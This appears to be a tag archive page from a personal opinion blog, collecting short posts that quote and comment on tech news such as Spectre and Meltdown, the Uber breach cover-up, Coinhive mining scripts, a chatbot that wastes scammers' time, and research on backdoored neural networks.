Tag: Computer

Dumb-Ass


Such a nice boy!

My son Charlie (Youtube Channel here, his Deviant Art here) decided to take his laptop with him to my nephew Sam’s Bar Mitzvah.

On the way home, he misplaced it.

Luckily, left it left the TSA bin at airport security, and his login screen has his name, so he called them today (Lost and Found was closed for the King holiday), and they will be sending it to him, at his expense, via express delivery.

Well, he can take solace that he is a lucky dumb-ass.

Note: I published this post with his express permission, so don’t go calling me a bad parent.

Scam Jujitsu, Online Style

Someone has developed a chatbot that screws around with scammers.

If you have some free time, you might want to avail yourself of this:

Chatbots. They’re usually a waste of your time, so why not have them waste someone else’s instead? Better yet: why not have them waste an email scammer’s time.

That’s the premise behind Re:scam, an email chatbot operated by New Zealand cybersecurity firm Netsafe. Next time you get a dodgy email in your inbox, says Netsafe, forward it on to me@rescam.org, and a proxy email address will start replying to the scammer for you, doing its very utmost to waste their time. You can see a few sample dialogues in the video above, or check out a longer back-and-forth below.

 Works for me.

There Is a Major Computer Not Vulnerable to Spectre or Meltdown

It turns out that, the Raspberry Pi is not subject to these vulnerabilities (From the Raspberry Pi blog) because they chose a processor that did not strive for the last iota of peformance.

The Raspberry Pi single board computer was designed as a low cost single board computer for use in computer education and in the 3rd world, and so absolute performance is not a priority, which means no predictive execution, and no vulnerabilities to either of these exploits:

Over the last couple of days, there has been a lot of discussion about a pair of security vulnerabilities nicknamed Spectre and Meltdown. These affect all modern Intel processors, and (in the case of Spectre) many AMD processors and ARM cores. Spectre allows an attacker to bypass software checks to read data from arbitrary locations in the current address space; Meltdown allows an attacker to read data from arbitrary locations in the operating system kernel’s address space (which should normally be inaccessible to user programs).

Both vulnerabilities exploit performance features (caching and speculative execution) common to many modern processors to leak data via a so-called side-channel attack. Happily, the Raspberry Pi isn’t susceptible to these vulnerabilities, because of the particular ARM cores that we use.

………

Modern processors go to great lengths to preserve the abstraction that they are in-order scalar machines that access memory directly, while in fact using a host of techniques including caching, instruction reordering, and speculation to deliver much higher performance than a simple processor could hope to achieve. Meltdown and Spectre are examples of what happens when we reason about security in the context of that abstraction, and then encounter minor discrepancies between the abstraction and reality.

The lack of speculation in the ARM1176, Cortex-A7, and Cortex-A53 cores used in Raspberry Pi render us immune to attacks of the sort.

Of course, we need the additional performance because no one writes tight code any more.

How Convenient!

After learning of the vulnerabilities of its processors, Intel CEO Brian Krzanich as much stock as was allowed under the company by-laws:

Brian Krzanich, chief executive officer of Intel, sold millions of dollars’ worth of Intel stock—all he could part with under corporate bylaws—after Intel learned of Meltdown and Spectre, two related families of security flaws in Intel processors.

While an Intel spokesperson told CBS Marketwatch reporter Jeremy Owens that the trades were “unrelated” to the security revelations, and Intel financial filings showed that the stock sales were previously scheduled, Krzanich scheduled those sales on October 30. That’s a full five months after researchers informed Intel of the vulnerabilities. And Intel has offered no further explanation of why Krzanich abruptly sold off all the stock he was permitted to.

As a result of his stock sale, Krzanich received more than $39 million. Intel stock, as of today, is trading at roughly the same price as Krzanich sold stock at, so he did not yield any significant gain from selling before the vulnerability was announced. But the sale may still bring scrutiny from the Securities and Exchange Commission for a number of reasons.

Nothing to see here, move along.

Forcefully Unmap Complete Kernel With Interrupt Trampolines

Yes, Apple crippled older phones, and Intel said, “Here, hold my beer.”

Basically the error can allow low level programs to take over the kernel, with a result kind of like that scene in Raiders of the Lost Ark when they open up the ark.

There is a fix, but it involves changes to the operating system that causes a significant performance hit, and Linux developers were unamused:

2) Namespace

   Several people including Linus requested to change the KAISER name.

   We came up with a list of technically correct acronyms:

     User Address Space Separation, prefix uass_

     Forcefully Unmap Complete Kernel With Interrupt Trampolines, prefix f%$#wit_

   but we are politically correct people so we settled for

    Kernel Page Table Isolation, prefix kpti_

   Linus, your call :))

As near as I can figure out, Intel’s claim that this is, “Not a bug,” and this appears to be true.

This appears to be a direct consequence of their attempt to boost processor performance in their competition with AMD, which appears not to be vulnerable to the “KPTI” bug, also called “Meldtown”.

However, it does appear that speculative execution in general creates a whole host of potential (though thankfully more difficult) exploits across a much wider range of processors. (This one is called Spectre).

I’m beginning to think that it is time for a major change in CPU architectures.

Bitcoin Jumps C. Cegaladon*

Long Island Iced Tea Company renamed itself, “Long Blockchain” and its stock exploded:

The Long Island Iced Tea Corporation is exactly what it sounds like: a company that sells people bottled iced tea and lemonade. But today the company announced a significant change of strategy that would start with changing its name to “Long Blockchain Corporation.”

The company was “shifting its primary corporate focus towards the exploration of and investment in opportunities that leverage the benefits of blockchain technology,” the company said in a Thursday morning press release. “Emerging blockchain technologies are creating a fundamental paradigm shift across the global marketplace,” the company said.

The stock market loved the announcement. Trading opened Thursday morning more than 200 percent higher than Wednesday night’s closing price.

Remember when everyone added dotcom to their company names JUST BEFORE IT ALL IMPLODED in the late 1990s?

Yeah, that.

*The largest shark, and likely largest predator fish ever. It died out some 1.5 million years ago. The Genus is still in dispute, between either Carcharodon (Great White) or Carcharocles (broad toothed Mako). So in jumping C. Megalodon, you have jumped the biggest shark ever.

Yeah, About that iPhone Conspiracy Theory

Now that Apple has been forced to reveal that it was actually slowing down old phones with software updates, the lawsuits have begun to pop up.

It appears that hiding this fact from customers, who felt compelled to spend 10 times as much on a new phone as they would on a battery replacement, has made some people angry:

Since news broke that Apple deliberately slows down the processor speed of iPhones as they age, the company has now been sued three times in various federal courts nationwide.

These proposed class-action lawsuits allege largely the same thing: that over time certain iPhones exhibited lower performance and that Apple fraudulently concealed this fact from owners. If those customers went to an Apple Store to investigate, they were encouraged to simply buy a new iPhone.

“Had Plaintiffs been informed by Apple or its technical/customer service support staff that a battery replacement would have improved the performance of the above devices, they would have opted to replace the batteries instead of purchasing new phones,” one of the lawsuits, Abdulla et al v. Apple, which was filed Thursday in federal court in Chicago, alleges.

This is a not particularly surprising consequence of living in Cupertino’s walled garden.

Quote of the Day

Instead of piling algorithms on top of algorithms on top of algorithms to fix the problems of your algorithms, how about let people choose which friend and brands and businesses or whatever to like or follow or whatever we call it this week and run the posts in reverse chronological order. If I see stupid sh%$ I can block it myself.

Atrios on Facebooks constant changes to algorithms to fight click-bait and its ilk.

(%$ mine)

I understand his point, and if he, or I, were customers of Facebook, but we aren’t. We are what Facebook is selling.

If we just saw what we wanted, Facebook wouldn’t be able to sell ¼ the ads that they do now.

Facebook algorithmic changes are about making delivery of the product (You, and Me, and Uncle Dave) more efficient.

To quote Sal Tessio from The Godfather, “It was only business.”

Travis Kalanick Continues to Leave a Trail of Slime

It turns out that Uber had a major data breach, with frightening levels of personal data taken about their drivers, and their response was to pay off the hackers and cover the whole affair up:

Hackers stole the personal data of 57 million customers and drivers from Uber Technologies Inc., a massive breach that the company concealed for more than a year. This week, the ride-hailing firm ousted its chief security officer and one of his deputies for their roles in keeping the hack under wraps, which included a $100,000 payment to the attackers.

Compromised data from the October 2016 attack included names, email addresses and phone numbers of 50 million Uber riders around the world, the company told Bloomberg on Tuesday. The personal information of about 7 million drivers was accessed as well, including some 600,000 U.S. driver’s license numbers. No Social Security numbers, credit card information, trip location details or other data were taken, Uber said.

I’m not inclined to believe Uber’s statements as to the limited scope of the breach.

At the time of the incident, Uber was negotiating with U.S. regulators investigating separate claims of privacy violations. Uber now says it had a legal obligation to report the hack to regulators and to drivers whose license numbers were taken. Instead, the company paid hackers to delete the data and keep the breach quiet. Uber said it believes the information was never used but declined to disclose the identities of the attackers.

That is so Uber.

Hackers have successfully infiltrated numerous companies in recent years. The Uber breach, while large, is dwarfed by those at Yahoo, MySpace, Target Corp., Anthem Inc. and Equifax Inc. What’s more alarming are the extreme measures Uber took to hide the attack. The breach is the latest scandal Khosrowshahi inherits from his predecessor, Travis Kalanick. 

Like the chicken said, “You knew the job was dangerous when you took it, Fred.”

BTW, Kalanick knew of the hack almost as soon as it happened.

Dara Khosrowshahi may have the worst job on the face of the earth.

The Value of a Liberal Arts Education

With a rather evocative headline, “How a half-educated tech elite delivered us into evil,” John Naughton explains how the people involved in tech these days are profoundly and deeply ignorant and incurious about the potential effects of what they are doing.

The Germans have a word for this, “Fachidiot,” and Japanese word for this is “専門バカ”:

One of the biggest puzzles about our current predicament with fake news and the weaponisation of social media is why the folks who built this technology are so taken aback by what has happened. Exhibit A is the founder of Facebook, Mark Zuckerberg, whose political education I recently chronicled. But he’s not alone. In fact I’d say he is quite representative of many of the biggest movers and shakers in the tech world. We have a burgeoning genre of “OMG, what have we done?” angst coming from former Facebook and Google employees who have begun to realise that the cool stuff they worked on might have had, well, antisocial consequences.

Put simply, what Google and Facebook have built is a pair of amazingly sophisticated, computer-driven engines for extracting users’ personal information and data trails, refining them for sale to advertisers in high-speed data-trading auctions that are entirely unregulated and opaque to everyone except the companies themselves.

The purpose of this infrastructure was to enable companies to target people with carefully customised commercial messages and, as far as we know, they are pretty good at that. (Though some advertisers are beginning to wonder if these systems are quite as good as Google and Facebook claim.) And in doing this, Zuckerberg, Google co-founders Larry Page and Sergey Brin and co wrote themselves licences to print money and build insanely profitable companies.

It never seems to have occurred to them that their advertising engines could also be used to deliver precisely targeted ideological and political messages to voters. Hence the obvious question: how could such smart people be so stupid? The cynical answer is they knew about the potential dark side all along and didn’t care, because to acknowledge it might have undermined the aforementioned licences to print money. Which is another way of saying that most tech leaders are sociopaths. Personally I think that’s unlikely, although among their number are some very peculiar characters: one thinks, for example, of Paypal co-founder Peter Thiel – Trump’s favourite techie; and Travis Kalanick, the founder of Uber.

I would actually argue that some in the tech field are willfully blind because their paycheck depends on this lack of awareness, while others are blind because they feel that they are somehow above such “mundane” concerns.

In either case, they aren’t people that we can trust with our future.

People Are Beginning to Come to My Point of View

For some time now, I have said that offensive cyber operations are a bad idea, because in order to hack someone, you are sending them a copy of your payload, and they can then use it themselves.

Ryan Cooper has come to this position as well:

Since August 2016, the National Security Agency has suffered a continual stream of devastating failures. Their internal hacking group, known as Tailored Access Operations (TAO), was breached 15 months ago by hackers calling themselves the “Shadow Brokers,” which has been dribbling out the contents of the NSA’s most prized hacking tools. The result has been a wave of internet crime — ransomware, lost files, and network attacks that disrupted businesses and cost hundreds of millions of dollars.

And as this New York Times story illustrates, the agency has been completely incapable of figuring out how the breach happened. Their computer networks could have been penetrated, or they could have someone on the inside leaking the tools. But after more than a year, they have not been able to plug the leak. It’s long past time the NSA was forced to stop hacking, and to start protecting the American people from the sort of tools they create.

At the time of the leak last year, I speculated that the NSA was exposing the American people to online attack, but I was not prepared for how bad it would be. Several huge ransomware attacks (in which a computer is infiltrated, its hard drive encrypted, and the de-encrypt key held for a bitcoin ransom) using NSA hacking tools have swept the globe, hitting companies like FedEx, Merck, and Mondelez International, as well as hospitals and telecoms in 99 countries.

Cyber weapons are different, because they are implicitly revealed, and available for manufacture and deployment, by the target once they are years.

Would it make sense to send drones after ISIS/ISIL/Daesh/Whatever if in so doing, they would be able to deploy drones against targets in the US?

This is how cyber works.

But What if it Gets Used for Evil ……… Oh ………Wait ……… It Already Has

Computer boffins in the land of Hobbits are using AI based chat bots to screw with scammers.

It’s a nice to see someone turning chat bots against the scammers:

Thousands of online scammers around the globe are being fooled by artificial intelligence bots posing as New Zealanders and created by the country’s internet watchdog to protect it from “phishing” scams.

Chatbots that use distinct New Zealand slang such as “aye” have been deployed by Netsafe in a bid to engage scammers in protracted email exchanges that waste their time, gather intelligence and lure them away from actual victims.

yber crime costs New Zealanders around NZ$250m annually. Computer programmers at Netsafe spent more than a year designing the bots as part of their Re:scam initiative, which went live on Wednesday.

Within 24 hours 6,000 scam emails had been sent to the Re:scam email address and there were 1000 active conversations taking place between scammers and chatbots.

So far, the longest exchange between a scammer and a chatbot pretending to be a New Zealander was 20 emails long.

The bots use humour, grammatical errors and local slang to make their “personas” believable, said Netsafe CEO Martin Cocker. As the programme engages in more fake conversations with scammers overseas, its vocabulary, intelligence and personality traits will grow.

Here’s hoping that the AIs will spend their time battling each other, and ,leave the rest of us alone.

Why Not to Trust the Cloud, Again

Google docs is amazing, except when it refuses to all you your own data:

A number of Google Docs users have reported being locked out of their documents today for, according to the message that pops up when they try to access the affected document, violating Google’s terms of service. Users that have tweeted about the issue have said their locked-out pieces were about a range of topics including wildfire crimes, post-socialist eastern Europe and a response to reviewers of an academic journal submission.

………

A Google spokesperson told us, “We’re investigating reports of an issue with Google Docs. We will provide more information when appropriate.” The range of subject matters and number of reports suggest it’s probably just a glitch, but the problem is a reminder of what we give up for the convenience and ease offered by cloud-based programs like Docs. Google Docs and others like it allow users to store their work offline, making it easily accessible wherever they happen to be. They also make it easy to share documents between a number of different people. But giving up control over your work comes with risks, as today’s issues make clear. And though they’re fairly rare, they can cause huge problems.

For example, Twitter user @widdowquinn said that while they had been encouraging others to use Google Docs for collaborative work on grants and academic papers, today’s glitch is a deal breaker.

“A dealbreaker?”

Gee, you think?  Google can shut you out from your own documents, because it violates their, “Terms of service,” and because it’s Google, which means that you will never, ever get even remotely close to a human being.

Seriously.

This is Kind of Tempting

The websites of US telly giant CBS’s Showtime contained JavaScript that secretly commandeered viewers’ web browsers over the weekend to mine cryptocurrency.

The flagship Showtime.com and its instant-access ShowtimeAnytime.com sibling silently pulled in code that caused browsers to blow spare processor time calculating new Monero coins – a privacy-focused alternative to the ever-popular Bitcoin. The hidden software typically consumed as much as 60 per cent of CPU capacity on computers visiting the sites.

The scripts were written by Code [Coin] Hive, a legit outfit that provides JavaScript to website owners: webmasters add the code to their pages so that they can earn slivers of cash from each visitor as an alternative to serving adverts to generate revenue. Over time, money mined by the Code-Hive-hosted scripts adds up and is transferred from Coin Hive to the site’s administrators. One Monero coin, 1 XMR, is worth about $92 right now.

Let me start by saying that I won’t be putting code like this on my site.

I am considering placing an additional button on my tip jar (aka Matthew’s Saroff’s Beer Fund), but it would take the form of another donation button, since the revenue from Google™ Adsense™ is so pathetic.

If I do this, it will be voluntary, another button to click on the page, and I might occasionally nag my reader(s) to click the button.

As always, note that this post should in no way be construed as an inducement or a request for my reader(s) to click on any ad that they would not otherwise be inclined to investigate further. This would be a violation of the terms of service for Google™ Adsense™.

Well, This is Great

Did you know that Equifax runs the My Social Security and is responsible for verifying data for Obamacare exchanges for the US government?

You know, that whole, “Reinventing Government”, thing that Bill Clinton put forward in the 1990s, when critical government functions were outsourced to private for-profit operators, is looking to be an even worse deal than when it was first implemented in the mid-1990s.

Of course, efficiency and savings were never really the goals: It was a depressingly successful attempt to subvert the civil service laws and to return to the spoils system.

Just ask President Garfield how well that worked out.

Libel Troll Fraudster Gets Case Thrown Out of Court

Shiva Ayyadurai claimed to have created email in 1978.

The facts, of course speak otherwise.

Email predates his high school freshman programming exercise by at least 10 years, email actually accounted for over half of all ARPANet traffic two years before he wrote his program, but that didn’t stop him from attempting to sue Techdirt out of existence, possibly in collusion with wannabe Bond villain and literal vampire Peter Thiel.

Well, the judge just threw out his whole case.

It’s not a complete win for the defendant, because the federal judge did not strike the case under California’s anti-SLAPP law, which would have have allowed them to sue for legal fees and penalties, but this is still an unambiguous win:

As you likely know, for most of the past nine months, we’ve been dealing with a defamation lawsuit from Shiva Ayyadurai, who claims to have invented email. This is a claim that we have disputed at great length and in great detail, showing how email existed long before Ayyadurai wrote his program. We pointed to the well documented public history of email, and how basically all of the components that Ayyadurai now claims credit for preceded his own work. We discussed how his arguments were, at best, misleading, such as arguing that the copyright on his program proved that he was the “inventor of email” — since patents and copyrights are very different, and just because Microsoft has a copyright on “Windows” it does not mean it “invented” the concept of a windowed graphical user interface (because it did not). As I have said, a case like this is extremely draining — especially on an emotional level — and can create massive chilling effects on free speech.

A few hours ago, the judge ruled and we prevailed. The case has been dismissed and the judge rejected Ayyadurai’s request to file an amended complaint. We are certainly pleased with the decision and his analysis, which notes over and over again that everything that we stated was clearly protected speech, and the defamation (and other claims) had no merit. This is, clearly, a big win for the First Amendment and free speech — especially the right to call out and criticize a public figure such as Shiva Ayyadurai, who is now running for the US Senate in Massachusetts. We’re further happy to see the judge affirm that CDA Section 230 protects us from being sued over comments made on the blog, which cannot be attributed to us under the law. We talk a lot about the importance of CDA 230, in part because it protects sites like our own from these kinds of lawsuits. This is just one more reason we’re so concerned about the latest attempt in Congress to undermine CDA 230. While those supporting the bill may claim that it only targets sites like Backpage, such changes to CDA 230 could have a much bigger impact on smaller sites like our own.

We are disappointed, however, that the judge denied our separate motion to strike under California’s anti-SLAPP law. For years, we’ve discussed the importance of strong anti-SLAPP laws that protect individuals and sites from going through costly legal battles. Good anti-SLAPP laws do two things: they stop lawsuits early and they make those who bring SLAPP suits — that is, lawsuits clearly designed to silence protected speech — pay the legal fees. The question in this case was whether or not California’s anti-SLAPP law should apply to a case brought in Massachusetts. While other courts have said that the state of the speaker should determine which anti-SLAPP laws are applied (even in other states’ courts), it was an issue that had not yet been ruled upon in the First Circuit where this case was heard. While we’re happy with the overall dismissal and the strong language used to support our free speech rights, we’re nevertheless disappointed that the judge chose not to apply California’s anti-SLAPP law here.

This guy is running for Senate in Massachusetts, as a Republican, and he gave a speech at the recent white supremacist rally in Boston.

He also claims that anyone who knows the history of email is a racist.

What a lovely fellow.

I’m Sorry Dave, I’m Afraid I Can’t Do That

What a surprise.

It turns that it is trivial to hack the most sophisticated Artificial Intelligence (AI) systems by simply training them poorly:

If you don’t know what your AI model is doing, how do you know it’s not evil?

Boffins from New York University have posed that question in a paper at arXiv, and come up with the disturbing conclusion that machine learning can be taught to include backdoors, by attacks on their learning data.

The problem of a “maliciously trained network” (which they dub a “BadNet”) is more than a theoretical issue, the researchers say in this paper: for example, they write, a facial recognition system could be trained to ignore some faces, to let a burglar into a building the owner thinks is protected.

The assumptions they make in the paper are straightforward enough: first, that not everybody has the computing firepower to run big neural network training models themselves, which is what creates an “as-a-service” market for machine learning (Google, Microsoft and Amazon all have such offerings in their clouds); and second, that from the outside, there’s no way to know a service isn’t a “BadNet”.

Note that current high end AI models are not so much programmed as trained, and it appears that this provides an unprecedented opportunity to develop malicious software.

I’m thinking that you might see an AI drone that gets the whole Manchurian Candidate treatment in the not too distant future.

Prank Turned Research Project


Not the test, just a a prank in the vid

At the Virginia Tech, researchers have dressed up a card seat to evaluate public responses to unmanned cars:

Tech blogs went crazy over the weekend after a new self-driving car was seen rolling around Arlington, Virginia.

Unlike vehicles from Google Waymo, Uber and others, the car didn’t have any obvious signs of a Lidar array, the chunky imaging technology most autonomous vehicles use to gauge the state of the road ahead. Instead, it had just a small bar mounted on the dashboard, which blinked red when it was at a stop light and green once the cost was clear.

Even more intriguingly, the car appeared to be genuinely autonomous: there was no-one sitting in the driver’s seat. Typically, a human overseer is required in the testing phase to make sure that the car doesn’t go wild and run over a marching band, but somehow this car had managed to find a loophole.

………

But still a question remained. Who was behind this breakthrough new technology? How were they solving the problems that had stymied even the mighty Alphabet/Google/Waymo megacorp?

You’ve read the headline. You know the answer: it was a bloke dressed up as a car seat.

………

But one aspect of the rumour mill was correct: the guy really was associated with Virginia Tech. According to the university’s transportation institute, he was engaged in research about autonomous vehicles, likely gathering data about the reaction of normal drivers to sharing road space with a self-driving car.

I’m not sure if this was a real study, or just an excuse for some researcher to f%$# with fellow drivers.

My money on the latter.